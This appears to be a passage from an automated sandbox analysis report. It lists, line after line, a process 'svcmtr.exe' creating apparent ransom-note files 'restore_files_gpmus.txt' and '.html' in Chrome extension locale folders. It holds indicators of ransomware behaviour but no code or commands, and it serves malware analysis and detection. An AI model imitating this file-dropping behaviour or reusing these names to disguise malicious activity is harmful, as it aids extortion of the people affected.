Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\fr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\he\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\he\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\hi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\hi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\hu\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\hu\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\id\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\id\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\it\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\it\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ja\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ja\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ko\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ko\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\lt\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\lt\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\lv\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\lv\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ms\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ms\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\nl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\nl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\no\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\no\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\pl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\pl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\pt_BR\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\pt_BR\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\pt_PT\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\pt_PT\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ro\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ro\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ru\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ru\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sk\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sk\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sl\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sv\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sv\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\th\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\th\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\tr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\tr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\uk\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\uk\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\vi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\vi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\zh_CN\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\zh_CN\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\zh_TW\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\zh_TW\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_metadata\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_metadata\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ar\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ar\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\bg\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\bg\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ca\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ca\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\cs\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\cs\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\da\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\da\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\de\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\de\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\el\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\el\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\en_GB\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\en_GB\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\en_US\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\en_US\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\es\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\es\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\es_419\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\es_419\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\et\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\et\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fil\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fil\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fr\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fr\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\he\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\he\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\hi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\hi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\hu\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\hu\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\id\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\id\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\it\restore_files_gpmus.txtJump to behavior
